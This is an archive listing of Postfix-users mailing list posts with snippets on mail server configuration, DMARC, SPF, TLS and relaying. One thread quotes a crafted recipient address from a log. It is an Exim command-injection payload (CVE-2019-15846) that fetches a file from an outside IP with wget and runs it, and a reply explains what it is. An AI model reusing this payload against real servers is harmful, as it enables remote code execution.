[pfx] Re: TLSRPT issue

2025-01-17 Thread A. Schulze via Postfix-users
On 17.01.25 at 15:00, Florian Piekert via Postfix-users wrote: I can confirm it works again for me now. same here, thanks Wietse! Andreas ___ Postfix-users mailing list -- postfix-users@postfix.org To unsubscribe send an email to postfix-users-le.

[pfx] Re: TLSRPT issue

2025-01-16 Thread A. Schulze via Postfix-users
&& !valid_hostaddr(domain, DONT_GRIPE)) smtp_tlsrpt_create_wrapper(state, domain); else applied to -20250107 but I didn't note any change - still no warning about a missing tlsrpt socket - if the socket is present, no tlsrpt data are written to that socket

[pfx] Re: limit sender by recipient domain (SOLVED)

2025-01-16 Thread A. Schulze via Postfix-users
On 16.01.25 at 20:56, A. Schulze via Postfix-users wrote: On 16.01.25 at 20:18, A. Schulze via Postfix-users wrote: But there is an additional requirement: - example.ORG receive messages from any senderdomain, - example.NET should only be reachable for a small set of senderdomains

[pfx] Re: limit sender by recipient domain

2025-01-16 Thread A. Schulze via Postfix-users
On 16.01.25 at 20:18, A. Schulze via Postfix-users wrote: But there is an additional requirement: - example.ORG receive messages from any senderdomain, - example.NET should only be reachable for a small set of senderdomains (authenticated by DMARC) /writing/ the requirement helps... the

[pfx] limit sender by recipient domain

2025-01-16 Thread A. Schulze via Postfix-users
Hello, I've an MX receiving for example.ORG Now, this MX should also handle messages for example.NET that's easy, add it to relay_domains ... But there is an additional requirement: - example.ORG receive messages from any senderdomain, - example.NET should only be reachable for a sm

[pfx] TLSRPT issue

2025-01-16 Thread A. Schulze via Postfix-users
Hello, I'm installing/running any postfix-3.10-* version in a lab environment. Till -20250103 the TLSRPT-part worked noiseless. But since -20250107 something is broken. My TLSRPT reporting engine no longer receive any data from postfix. If I disable the TLSRPT reporting engine, I not eve

[pfx] Re: Implicit TLS via SRV record?

2024-12-29 Thread A. Schulze via Postfix-users
ks on the opportunistic approach of STARTTLS I can't agree. A active attacker, able to strip STARTTLS from the EHLO server response, is also able to strip the SRV record from dns. It's only harder. I do not think, this is currentl

[pfx] Re: 8bit GECOS in From not encoded?

2024-12-01 Thread A. Schulze via Postfix-users
On 01.12.24 at 17:07, Wietse Venema via Postfix-users wrote: The remote server announces SMTPUTF8, but Postfix does not request SMTPUTF8. It is as if the SMTP client has "smtputf8_enable = no". Hello Wietse, I don't think it's an SMTPUTF8 issue. SMTPUTF8 primary handle non-ascii local par

[pfx] redundant TLS logging?

2024-11-15 Thread A. Schulze via Postfix-users
HA256 (128/128 bits) key-exchange x25519_kyber768 server-signature RSA-PSS (2048 bits) server-digest SHA256 This is a regular pattern in my logs I observe already for a long time. It's not new, it doesn't hurt but it feels unnecessary. Is this an expected behavior or are there reasons to

[pfx] Re: no ptr, so i greylist

2024-11-11 Thread A. Schulze via Postfix-users
Benny Pedersen via Postfix-users: tux ~ # host 45.90.5.195 195.5.90.45.in-addr.arpa domain name pointer list.sys4.de. mx ~ # host 45.90.5.195 Host 195.5.90.45.in-addr.arpa not found: 2(SERVFAIL) Hi Benny, this seems to be a local problem on your side. But there is probably a glitch on

[pfx] Re: question about postmaster account

2024-07-28 Thread A. Schulze via Postfix-users
On 28.07.24 at 10:03, Ralph Seichter via Postfix-users wrote: Yes. The requirement has been specified as early as 1981 in RFC 822, and in its successors up to and including RFC 5322. https://datatracker.ietf.org/doc/html/rfc5321#section-4.5.1 5321 btw... Andreas

[pfx] Re: Which DKIM application for postfix 3.9.0

2024-03-07 Thread A. Schulze via Postfix-users
it on production level. I run Solaris and therefore need to compile my applications, postfix and dkim. then you could give opendkim a chance. use this branch as starting point: https://github.com/trusteddomainproject/OpenDKIM/tree/develop At the end you get signing+validation for rsa, ed25519 using ope

[pfx] Re: Log/Capture outbound messages?

2024-01-27 Thread joe a via Postfix-users
On 1/26/2024 20:55:16, Viktor Dukhovni via Postfix-users wrote: On Fri, Jan 26, 2024 at 07:51:31PM -0500, Wietse Venema via Postfix-users wrote: joe a via Postfix-users: Postfix 3.5.9-5.9.2 Perhaps not a postfix question at all. Looking for a way to capture outbound email, for

[pfx] Re: Log/Capture outbound messages?

2024-01-27 Thread joe a via Postfix-users
On 1/26/2024 19:51:31, Wietse Venema via Postfix-users wrote: joe a via Postfix-users: Postfix 3.5.9-5.9.2 Perhaps not a postfix question at all. Looking for a way to capture outbound email, for troubleshooting purposes. Is "smtp-sink" the way to do this? That could be,

[pfx] Log/Capture outbound messages?

2024-01-26 Thread joe a via Postfix-users
Postfix 3.5.9-5.9.2 Perhaps not a postfix question at all. Looking for a way to capture outbound email, for troubleshooting purposes. Is "smtp-sink" the way to do this?

[pfx] Re: Postfix stopped logging lines with sender IP addresses after upgrade

2024-01-02 Thread A. Schulze via Postfix-users
On 02.01.24 at 20:44, Vince Heuser via Postfix-users wrote: smtp   inet  n   -   y   -   -   smtpd Hi, the smtp server run chroot. You need to configure syslog to listen on /path/to/postfix-chroot/dev/log (usually /var/spool/postfix/dev/log) Andreas

[pfx] Value of client certificates, was: Re: Re: [ext] list.sys4.de fails with starttls

2023-09-25 Thread A. Schulze via Postfix-users
. Hello Viktor, OK, so far I can follow your arguments. But there is one thing that don't match in that picture: It's how I see Google's outbound servers operate. ¹) If I read my mail archive right, Google use client certificates at least since 2015! If operating SMTP client

[pfx] Re: pattern matching in local tables

2023-07-07 Thread joe a via Postfix-users
On 7/7/2023 5:12 PM, Wietse Venema via Postfix-users wrote: joe a via Postfix-users: On 7/7/2023 3:46 PM, joe a via Postfix-users wrote: One hesitates to post this. Found some oddness when changing a destination in transport_maps (transport_maps = lmdb:/etc/postfix/transport). Seems related

[pfx] Re: pattern matching in local tables

2023-07-07 Thread joe a via Postfix-users
On 7/7/2023 3:46 PM, joe a via Postfix-users wrote: One hesitates to post this. Found some oddness when changing a destination in transport_maps (transport_maps = lmdb:/etc/postfix/transport). Seems related to pattern matching. The file /etc/postfix/transport contains entries of this form

[pfx] pattern matching in local tables

2023-07-07 Thread joe a via Postfix-users
One hesitates to post this. Found some oddness when changing a destination in transport_maps (transport_maps = lmdb:/etc/postfix/transport). Seems related to pattern matching. The file /etc/postfix/transport contains entries of this form: somename-xyz.comnoauth:ipaddress_1

[pfx] Re: Ongoing authentication issue, SASL support?

2023-07-07 Thread joe a via Postfix-users
On 7/6/2023 5:12 PM, Noel Jones via Postfix-users wrote: On Jul 6, 2023, at 2:55 PM, joe a via Postfix-users wrote: On 7/6/2023 12:56 PM, joe a via Postfix-users wrote: On 7/6/2023 8:53 AM, Viktor Dukhovni via Postfix-users wrote: On Thu, Jul 06, 2023 at 08:32:42AM -0400, joe a via

[pfx] Re: Ongoing authentication issue, SASL support?

2023-07-06 Thread joe a via Postfix-users
On 7/6/2023 12:56 PM, joe a via Postfix-users wrote: On 7/6/2023 8:53 AM, Viktor Dukhovni via Postfix-users wrote: On Thu, Jul 06, 2023 at 08:32:42AM -0400, joe a via Postfix-users wrote: While chasing a postfix (version 3.5.9) to dovecot authentication issue, checked "compiled in"

[pfx] Re: Ongoing authentication issue, SASL support?

2023-07-06 Thread joe a via Postfix-users
On 7/6/2023 8:53 AM, Viktor Dukhovni via Postfix-users wrote: On Thu, Jul 06, 2023 at 08:32:42AM -0400, joe a via Postfix-users wrote: While chasing a postfix (version 3.5.9) to dovecot authentication issue, checked "compiled in" methods: postconf -a cyrus dovecot p

[pfx] Ongoing authentication issue, SASL support?

2023-07-06 Thread joe a via Postfix-users
While chasing a postfix (version 3.5.9) to dovecot authentication issue, checked "compiled in" methods: postconf -a cyrus dovecot postconf -A cyrus Does this mean the choices for configuring authentication are affected? Dovecot and Postfix were installed from packaged versio

[pfx] Re: mail relayed for new server rejected by SIP

2023-07-04 Thread joe a via Postfix-users
On 7/4/2023 9:55 PM, joe a via Postfix-users wrote: I realize this is lacking information normally requested, but before sending such, was hoping for a bit of a sanity check, without seriously annoying those more knowledgeable than I. Have working version of postfix 3.5.9 which acts as a

[pfx] mail relayed for new server rejected by SIP

2023-07-04 Thread joe a via Postfix-users
I realize this is lacking information normally requested, but before sending such, was hoping for a bit of a sanity check, without seriously annoying those more knowledgeable than I. Have working version of postfix 3.5.9 which acts as a relay for a low volume in house system, authenticating

[pfx] Re: Postfix sending to undefined (?)

2023-07-02 Thread joe a via Postfix-users
On 7/2/2023 7:07 PM, Viktor Dukhovni via Postfix-users wrote: On Sun, Jul 02, 2023 at 06:49:53PM -0400, joe a via Postfix-users wrote: > Viktor Dukhovni via Postfix-users Sun, 02 Jul 2023 14:21:52 -0700 > >On Sun, Jul 02, 2023 at 05:11:52PM -0400, joe a via Postfix-use

[pfx] Re: Postfix sending to undefined (?)

2023-07-02 Thread joe a via Postfix-users
> Viktor Dukhovni via Postfix-users Sun, 02 Jul 2023 14:21:52 -0700 > >On Sun, Jul 02, 2023 at 05:11:52PM -0400, joe a via Postfix-users >wrote: > >> When attempting to send an email to postfix on that box, for delivery >to >> the local dovecot (via lmtp), the mess

[pfx] Postfix sending to undefined (?) relay

2023-07-02 Thread joe a via Postfix-users
Setup a test system with dovecot and postfix, version 3.5.9, intending to create an "imap server" for local use. When attempting to send an email to postfix on that box, for delivery to the local dovecot (via lmtp), the message instead goes out to my ISP in the fashion of current

[pfx] surprise with strict_mime_encoding_domain

2023-04-04 Thread A. Schulze via Postfix-users
Hello, an SMTP Server with strict_mime_encoding_domain=yes blocked some messages (which was ... unexpected) # postconf mail_version mail_version = 3.7.4 # postconf -n alias_maps = maillog_file = /dev/stdout smtpd_recipient_restrictions = defer strict_mime_encoding_domain = yes # postconf -M s

[pfx] Re: The joke writes itself.

2023-03-10 Thread Cooper, Robert A via Postfix-users
Some of us don't have a choice and are stuck with MS mail products due to work policies. while OWA does now support header filtering, that has not always been the case. Other may be in similar situations with required clients that don't have all the features you want for a power user

[pfx] Re: The joke writes itself.

2023-03-10 Thread Cooper, Robert A via Postfix-users
sting by members only." (and yes, the new list-id actually has postfix-users.postfix.org, instead of @.) RobertC (ps and before anyone gets mad at me for top-posting replies, take a minute to tell me how to make OWA do that. I can't find any way to change it.)

[P-U] OpenDMARC crash, was: Re: Postfix lists are migrating to a new list server

2023-03-07 Thread A. Schulze via Postfix-users
On 07.03.23 at 20:37, postfix--- via Postfix-users wrote: OpenDMARC is segfaulting. That's what 'signal 11' means. Postfix fails to get an answer to its end-of-body milter call because of the segfault closing the other end of that socket. That failure results in Postfix s

[P-U] Re: Postfix lists are migrating to a new list server

2023-03-07 Thread Cooper, Robert A via Postfix-users
quests. Open subscription, unmoderated, posting by members only." So filtering on List-Id contents didn't work. RobertC From: Benny Pedersen via Postfix-users Sent: Tuesday, March 7, 2023 11:02 To: postfix-users@postfix.org Subject: [P-U] Re: Postfix lists

Authenticated Receive Chain (ARC Sealing) in Postfix?

2023-01-02 Thread Cooper, Robert A
I have a request from my downstream Exchange admins to look into implementing ARC sealing in some postfix relay servers we use for address rewriting. From the bit of research I've done, it looks like this would require being implemented in an external milter. I had not even heard o

Re: dig reports NXDOMAIN but Postfix thinks otherwiese

2022-12-06 Thread A. Schulze
On 06.12.22 at 19:06, Fred Morris wrote: This is a good use for DNS Response Policy Zones (RPZ) to prevent leakage, as well as an illustration of why doing some broad brush statistical monitoring of DNS traffic is a useful practice. it's easier to consequent avoid 'searc

Re: [External] Re: Outlook TLS errors after Microsoft Windows Update

2022-10-26 Thread Kevin A. McGrail
Transport Layer Security (TLS) connections. These connections might have handshake failures. For developers, the affected connections are likely to send multiple frames followed by a partial frame with a size of less than 5 bytes within a single input buffer. If the connection fails, your app will

Re: [External] What does AW mean - was - Re: AW: RSA and ECDSA - warning: No certs for key at index 1

2022-05-31 Thread Kevin A. McGrail
On 5/31/2022 10:18 AM, Bret Busby wrote: I keep seeing "AW" prepended to message subjects and I have no idea of what it means. What does it mean? I believe it's the German equivalent for re: (https://en.wikipedia.org/wiki/List_of_email_subject_abbreviations) as in Regarding. Regards, KAM

Re: DMARC in postfix ?

2022-04-14 Thread A. Schulze
On 13.04.22 at 05:31, John Levine wrote: > For doing DMARC validation, I know about the opendmarc milter. Is that what > everyone uses? Is there anything else used in practice? Hello John, rspamd handle DMARC as well. But it's also a milter. This is intentional: Wie

Re: [External] Re: Why the name Postfix?

2022-03-28 Thread Kevin A. McGrail
Great Idea!  Done On 3/27/2022 6:08 PM, lists wrote: Perhaps someone who knows how to update wiki can add this information. https://en.wikipedia.org/wiki/Postfix_(software)

Tuning question for very large mail batches

2022-03-01 Thread Cooper, Robert A
Howdy! I'm trying to figure out some tuning for a cluster of postfix servers behind a load balancer. The load balancer simply does a round-robin of 4 nodes, direct TCP passthrough and does not mangle the traffic in any way. We are running RHEL/CentOS 7 packaged Postfix 2.10 currently.

Re: GhettoForge Postfix3

2022-01-18 Thread Cooper, Robert A
> it's the > latest (presumably stable) release. They appear to have Postfix > 3.6 at this time. Yes, I see that. But why "Postfix3"? How is that different from normal Postfix? If it's a repo providing the same

strict_7bit_headers, strict_8bitmime and strict_8bitmime_body

2021-12-13 Thread A. Schulze
Hello, the documentation say for these settings: > This feature should not be enabled on a general purpose mail server, because > it is likely to reject legitimate email Is it possible to activate a kind of log only mode similar to "warn_if_reject"? That would allow admini

Re: Mail bypassing relayhost configuration

2021-10-26 Thread Cooper, Robert A
error:undeliverable I am not finding anywhere in our configuration where email.site.com is set to use an alternate transport. This is a grep through the postfix config for any entry of our domain. Nothing there stands out as a transport config. # cd /etc/postfix # grep -i site * main.cf:mydomain

Mail bypassing relayhost configuration

2021-10-26 Thread Cooper, Robert A
Howdy! We have noticed that certain email going through our outbound relay are ignoring the "relayhost = [smtp-relay.site.com]:25". The condition seems to be when a message has an envelope rewrite based on LDAP lookup (specifically, from site.com to email.site.com, which goe

Re: [External] Re: turning off spamass-milter for authenticated submissions? SPF for submitted emails?

2021-10-12 Thread Kevin A. McGrail
On 10/11/2021 6:28 PM, Carl Brewer wrote: http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. Carl, I noticed this and wanted to mention if you are using something like Google's quad8 for your resolver?  If so, install a ca

Re: [External] Re: turning off spamass-milter for authenticated submissions? SPF for submitted emails?

2021-10-11 Thread Kevin A. McGrail
and wanted to mention if you are using something like Google's quad8 for your resolver?  If so, install a caching local nameserver. You might also consider adding the KAM channel to your rules. Over 17 years of publishing them for the world for free now: https://mcgrail.com/tem

Re: logging from scripts executed by pipe

2021-08-10 Thread A. Schulze
Wietse Venema: A. Schulze: Is there a recommended/any way to log messages from a script via postfix? Not at this time. Making the postlog command setgid requires a security analysis and that may require some code restructuring before this can be done without opening up a security hole

logging from scripts executed by pipe

2021-08-10 Thread A. Schulze
Hello, I've to rebuild a service: messages to an address are delivered via postfix pipe to a script. This script use syslog to write it's messages. That worked well for years. Now, postfix run in a different way, supervised via "postfix start-fg" (docker) Essentially the is

Re: Speaking of Firefox and HTTP^H^H^H^HFTP...

2021-04-23 Thread Cooper, Robert A
Because FTP lets me PUT files into a location without the hassle of setting up some kind of upload script, where you have to filter and tinker with permissions, so that you don't allow a malicious executable to be uploaded that can simply be run by visiting said file in a browser? Grant

Re: [External] Postfix and Mimedefang for single user?

2021-03-28 Thread Kevin A. McGrail
Hi LuKreme, I believe once you hook in MIMEDefang with postfix, it's a general purpose filter that uses the milter interface to process emails at various stages of the mail dialogue and processing.  It hurts my brain to think about whether Postfix could do a filter on the recipients and

Re: Deprecated: white is better than black

2021-02-24 Thread Scott A. Wozny
Postfix version 3.6 deprecates terminology that implies white is >> better than black. On 24.02.21 19:29, Jaroslaw Rafa wrote: >-1 > >I already wrote when there was a discussion about it that changing this is a >waste of time and effort. > >"Blacklist" and "

Re: [External] Re: Deprecated: white is better than black

2021-02-24 Thread Kevin A. McGrail
If it helps with others, the SA project uses WelcomeList and BlockList so you don't have to change acronyms like RBL.  Some slides from a talk at https://mcgrail.com/downloads/DevFest%202020%20-%20Removing%20Racially%20Charged%20Language%20from%20Technology%20Speaker%20Presentation%

Re: client and ehlo hostname mismatch

2021-02-10 Thread Cooper, Robert A
My primary outbound relay cluster connects through a load balancer NAT so when it gives "helo host1.services.domain.tld" it actually reverses to the hostname assigned to the load balancer (relay.domain.tld). there are multiple nodes that all lookup with the single NAT IP when

Re: File-format for Included Files for main.cf Options

2021-01-12 Thread JL (Postfix Readers A/c)
's not in the documentation anywhere. It's not clear where would be a good place to write it up, without repeating the explanation in-line everywhere a file argument is mentioned. The additional clarification about comments needing to start in the first column was helpful, and good to know

File-format for Included Files for main.cf Options

2021-01-11 Thread JL (Postfix Readers A/c)
Hi, I can't find it in the docs or from a search of this mailing-list... When a main.cf entry specifies a filename, I know the contents are inserted in place. But the exact format of said file is unclear. I don't think it is literally "included" in-line, because a file tha

Re: [External] SPAM attack from bounce techniques

2020-12-29 Thread Kevin A. McGrail
On 12/29/2020 7:37 AM, Rafael Azevedo wrote: Hi there, I've noticed that one of our servers is receiving a huge amount of unauthorized requests. User connects to our server and tries to send an email to any destination. Our servers denies the message because user is not authenticated.

Re: Security threat posed by names and IPs in SMTP headers

2020-12-13 Thread Scott A. Wozny
Wow! Thanks, I didn't realize this was an option. A really pretty balance of maintaining the internal routing information for troubleshooting purposes without sending it to the Internet. Not totally settled on the actual level of threat posed by leaking this info, but a great option to

Re: Security threat posed by names and IPs in SMTP headers

2020-12-13 Thread Scott A. Wozny
Hi Wietse, I definitely agree there are LOTS more important things in the world to be worried about when connecting a system to an untrusted network, I was just curious how much people doing this in the real world were worried about the information leakage that sits somewhere between "inh

Security threat posed by names and IPs in SMTP headers

2020-12-12 Thread Scott A. Wozny
I haven’t been able to find any particularly good guidance about this on the Internet so I figured I’d ask those in the trenches for their opinions regarding where they land on this. I know it’s not a Postfix specific matter and if anyone thinks I should be posing this question elsewhere

Re: Mail server without MX record.

2020-10-13 Thread A. Schulze
On 13.10.20 at 14:09, Jason Long wrote: > I want to know can I use it without MX record? A records are used by default if no MX is available That's nothing postfix specific - it's an RFC requirement for any MTA Andreas

Re: Why emails sending to Spam?

2020-10-12 Thread Scott A. Wozny
That's a wildly open question. Your first step is to look at the headers of a message you've sent on the received end. Most anti-spam filters leave artifacts in the headers and my guess is that will lead you to something you can change about your mail server to make your messages

Re: [External] Re: postfix and MX

2020-09-17 Thread Kevin A. McGrail
inguish plans are well known but I also think a thing of the past.  I've been pretty impressed by their netizenship in the past decade.  Not saying it didn't take the US DoJ for a wake-up call but really impressed with what I've seen.  Is there a specific and recent example you can think of? Regards, KAM

Re: [External] spam uses my email address as sender in "header from"

2020-09-14 Thread Kevin A. McGrail
On 9/14/2020 6:35 AM, Fourhundred Thecat wrote: > Can I reject messages that have different envelope from and header from? > > Or what would be the best approach ? Are you publishing an SPF record?  Are you using DKIM?  Are you publishing a DMARC policy (even one with policies of no

debugging strategy

2020-07-10 Thread A. Schulze
Hello, I operate a postfix server + some milters. Some messages running over this MTA generate some trouble on the receiver side. I nailed down the problem to be the content, I receive from the client. It's an application I personally don't control. To Debug the problem, I must as

Behavior change in notifications after upgrading Postfix from 2.6.6 to 3.3.1

2020-07-06 Thread Sebby, Brian A.
We recently migrated a few of our mail servers from RHEL 6 with Postfix 2.6.6, to RHEL 8 with Postfix 3.3.1. I noticed a change in behavior after we upgraded, and I wondered if anyone had any insight into the change. Before, while Postfix would send undeliverable messages from MAILER-DAEMON

Re: Cannot assign requested address -- with "inet_protocol = ipv4" in main.cf

2020-06-28 Thread A. Schulze
On 25.06.20 at 20:58, Greg Sims wrote: > I set "inet_protocol = ipv4" in main.cf . postconf inet_protocol postconf: warning: inet_protocol: unknown parameter postconf inet_protocols ? Andreas

Re: Questions about the master.cf file

2020-06-10 Thread Scott A. Wozny
Hi Doug, Very much appreciate your response. In combination with Noel’s email, I think I get what’s going on now. All of this was, of course, in the service type section of http://www.postfix.org/master.5.html. Once I had an idea what I was looking for and gave it a slow re-read, it’s all

Re: Questions about the master.cf file

2020-06-10 Thread Scott A. Wozny
Hi Noel, Thanks very much for your reply. For some reason, I had assumed that the service name was dictated by convention, not the contents of /etc/services. I DID have a nagging question about how Postfix knew to listen on 25 and 587, but I assumed it was a system default and I had just

Questions about the master.cf file

2020-06-09 Thread Scott A. Wozny
In the context of looking at implementing Postscreen, I’ve read through the postscreen readme, the master.cf man page, and postfix architectural overview docs, but I have some remaining service related questions I might appeal to one of the gurus on the list to help me with. In a default

Re: [External] Re: The historical roots of our computer terms

2020-06-08 Thread Kevin A. McGrail
On 6/8/2020 9:54 AM, vi...@vheuser.com wrote: > > On 2020/06/08 09:31 AM, Kevin A. McGrail wrote: >> On 6/8/2020 9:06 AM, John Dale wrote: >>> Why does this agitate people?  Because if the time spend on this >>> change had been used to fix an actual deficiency, p

Re: [External] Re: The historical roots of our computer terms

2020-06-08 Thread Kevin A. McGrail
On 6/8/2020 9:06 AM, John Dale wrote: > Why does this agitate people?  Because if the time spend on this > change had been used to fix an actual deficiency, people of color who > use the software would have been served with value, not just platitudes. Sounds like a lot of pontificating.

Re: [External] Re: The historical roots of our computer terms

2020-06-08 Thread Kevin A. McGrail
On 6/8/2020 8:37 AM, Phil Stracchino wrote: > The color is widely and somewhat sardonically known as 'bleen' or 'grue'. See, that's just wrong. We all know what a Grue is... Regards, KAM https://zork.fandom.com/wiki/Grue

Re: Postfix restrictions

2020-06-07 Thread A. Schulze
On 07.06.20 at 14:38, yuv wrote: > Is there a valid reason for a sender not to fix something so essential > as DNS configuration? no valid reason but reality. There are so many sendings hosts named "foobar.local". Via NAT they are visible with a public IP and a perfect DNS

Re: Postfix restrictions

2020-06-07 Thread A. Schulze
On 07.06.20 at 11:51, Nicolas Kovacs wrote: using "reject_unknown_helo_hostname" may trigger some false positives. Not every sender have such perfect setups. You may use "warn_if_reject reject_unknown_helo_hostname" for some time and check if loosing such traffic is acceptable for you. Andr

Re: [External] Re: The historical roots of our computer terms

2020-06-06 Thread Kevin A. McGrail
On 6/6/2020 11:00 AM, Ian Evans wrote: > > > On Sat, Jun 6, 2020, 10:28 AM Kevin A. McGrail, <mailto:kmcgr...@pccc.com>> wrote: > > Thanks for the reminder on this.  The Apache SpamAssassin project > voted to do this change on May 3rd and I'm takin

Re: [External] Re: The historical roots of our computer terms

2020-06-06 Thread Kevin A. McGrail
How easy would it >> be for Postfix/Postscreen configs/docs to, say, refer to allow/deny lists? > Easily, if they can be acessed via DNSBL/DNSWL qeueries. Any 'new' > lookup mechanism will have to be added through a postscreen policy > plugin, and that involves new Postfix co

Dropping email purporting to be from my domain received from the Internet

2020-05-29 Thread Scott A. Wozny
In my hypothetical environment, I have an external and an internal relay on either sides of a firewall. I want to configure the external system to relay both 1) email received from the internal relay to the Internet and 2) email received from the Internet to the internal relay (as long as the

Re: Relationship between relay and transport

2020-05-29 Thread Scott A. Wozny
Thanks very much for the reply. I think my root difficulty was understanding the hierarchy behind forwarding rules (in this specific case; between relay and transport related parameters / tables). Your examples put me onto http://www.postfix.org/transport.5.html which gave me a much better idea

Relationship between relay and transport

2020-05-27 Thread Scott A. Wozny
I’m trying to get a better understanding of the relationship between relay and transport. In the standard config on an email gateway in (http://www.postfix.org/STANDARD_CONFIGURATION_README.html#firewall) the proposed config has relay_domains set for example.com and transport_maps set to a

OFF-TOPIC: Re: [External] Re: why DMARC PASS even SPF got failed

2020-04-28 Thread Kevin A. McGrail
> Scott, I have another question. Gents, I love geeking about email and spam techniques but these are not postfix related nor do they relate to beer*.  IMO these should be discussed elsewhere. Regards, KAM * There are some mailing lists with exclusions that discussions on beer are always on-top

Re: [External] command injection by crafted recipient address

2020-03-12 Thread Kevin A. McGrail
On 3/12/2020 4:40 PM, kris_h wrote: > root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost It's an exim exploit.  See CVE-2019-15846. Regards, KAM

Re: [External] Re: SPF IP addresses limit question

2020-02-24 Thread Kevin A. McGrail
n the anti-spam world, we analyze SPF records for indicators that they are overly broad and non-specific as an indicator of a lack of postmaster hygiene.  And if your SPF is poorly done and others can spoof your domain by having adjacent IPs, that's bad too!  Make your SPF record as accurate an

Re: [External] Re: SPF IP addresses limit question

2020-02-23 Thread Kevin A. McGrail
On 2/23/2020 7:08 PM, Scott Kitterman wrote: > The limits are a function of DNS, not SPF, which is why RFC 7208 Section 3.4. > was written. I would there is also a somewhat arbitrary limit that was picked that doesn't match the real world.  See https://bz.apache.org/SpamAssassin/s

Re: How to restrict imposters

2020-02-20 Thread a
> @lbutlr wrote: >> > a wrote: >> > > However, an outside network can still identify as a local email >> > > account to send into my network, making imposters possible. >> > >> > Do not allow connections on port 25 that claim to be from your do

Re: How to restrict imposters

2020-02-20 Thread a
> @lbutlr wrote: > > a wrote: > > > However, an outside network can still identify as a local email > > > account to send into my network, making imposters possible. > > > > Do not allow connections on port 25 that claim to be from your domains. > >

How to restrict imposters

2020-02-18 Thread a
aying from outside networks to other email addresses and that's how I need it to work. It's great postfix is set to do this by default. However, an outside network can still identify as a local email account to send into my network, making imposters possible. Is there a flag I can use to s

Re: Are there plans for a buld-in support of REDIS-tables?

2020-01-09 Thread A. Schulze
On 09.01.20 at 17:12, kris_h wrote: > We distribute the more dynamic tables - e.g. cidr-tables with self-harvested > current spammer's IPs - actually by simply distributing those files with > rsync. we use an rbldnsd to build and serve an internal zone with similar data. Usual DNS lookups are

MDB_MAP_FULL: Environment mapsize limit reached

2020-01-09 Thread A. Schulze
Hello, running postfix-3.4.7 on Debian 10 I found the following warning in my logs: postfix/tlsmgr[705]: warning: lmdb:/var/lib/postfix/smtp_tls_session_cache is unavailable. open database /var/lib/postfix/smtp_tls_session_cache.lmdb: MDB_MAP_FULL: Environment mapsize limit reached on

Re: [External] Block email based on reply field

2019-12-11 Thread Kevin A. McGrail
If you have integrated with Apache SpamAssassin, then v3.4.3 introduces the ability to do RBL lookups on the domain in Reply-to as well as the ability to do hashed lookups. Regards, KAM On 12/11/2019 9:38 PM, li...@lazygranch.com wrote: > I have a spammer who uses all sorts of "from"

Re: different message_size_limit per smtpd (solved)

2019-11-20 Thread A. Schulze
is >> enforced by the cleanup daemon. > > How do you set a different limit in cleanup then? Or do you set > message_size_limit to the maximum size for submission and then set a separate > limit for smtpd? How would you do that? > > main.cf: >message_size_limit=4000

different message_size_limit per smtpd

2019-11-20 Thread A. Schulze
Hello, My goal is to allow different message size on MX and submission. As message_size_limit is a cleanup option, this is my (non working) setup based on http://www.postfix.org/BUILTIN_FILTER_README.html#mx_submission main.cf message_size_limit = 512 master.cf # define a

Re: may we suggest ICANN not run that many new tlds?

2019-11-19 Thread A. Schulze
On 19.11.19 at 10:58, Merrick wrote: > may we suggest ICANN not open a new TLD anymore? yes, you can: https://www.icann.org/public-comments

Re: postfix startup sequence

2019-11-12 Thread A. Schulze
On 12.11.19 at 03:52, Fourhundred Thecat wrote: > /usr/sbin/postfix quiet-quick-start this is Debian specific https://sources.debian.org/src/postfix/3.4.5-1/debian/patches/09_quiet_startup.diff/ You've to ask on a Debian list because - Wietse already noted - it's unsupported Andreas

build in EDH parameters

2019-11-10 Thread A. Schulze
(https://tools.ietf.org/html/rfc7919) offer a "Supported Groups Registry" Andreas

Re: block 'new style' TLDs ?

2019-11-02 Thread Kevin A. McGrail
is not allowed >> >> >> Of course your list will differ than mine, but I find this much >> better than reacting to which of these new garbage TLDs are spamming >> me this week. > > You can achieve a similar result with this addition to SA's custom.cf: > &g

Re: "SPF no-mail record" clashing with reject_unknown_recipient_domain

2019-10-28 Thread A. Schulze
Ehlers, Y.W. (Ydo): There is no MX record, there is no A record, so mail can not be delivered. And Microsoft tops it off by explicitely claiming no e-mail will be send from this domain for the record: one like to use RFC 7505 to express "this domain don't send / receive email"

Re: Respecting MTA-STS

2019-10-11 Thread A. Schulze
t it's also known, Gmail is able to do such stuff very selective to prevent damage. In theory, an SMTP client, postfix smtp for example, could always try to connect to a remote destination using SNI, log success or failure and fallback to reconnect without SNI. That would enable users to gathe

Re: Respecting MTA-STS

2019-10-11 Thread A. Schulze
known by a dozen names, unless the SNI is provided. I don't fully understand the value of SNI for MTA-to-MTA communication, but that's an other problem. I suggest to look at https://github.com/Snawoot/postfix-mta-sts-resolver ... Andreas

Re: Refuse mail from hosts with closed port 25

2019-09-16 Thread Kevin A. McGrail
On 9/16/2019 11:00 AM, Benny Pedersen wrote: > Kevin A. McGrail wrote on 2019-09-16 16:19: >> Fair enough.  Maybe he should turn that feature on then :-) > > if you do you cant recieve email from me > > validMX is strict to say domains without MX is invalid domain ? > >
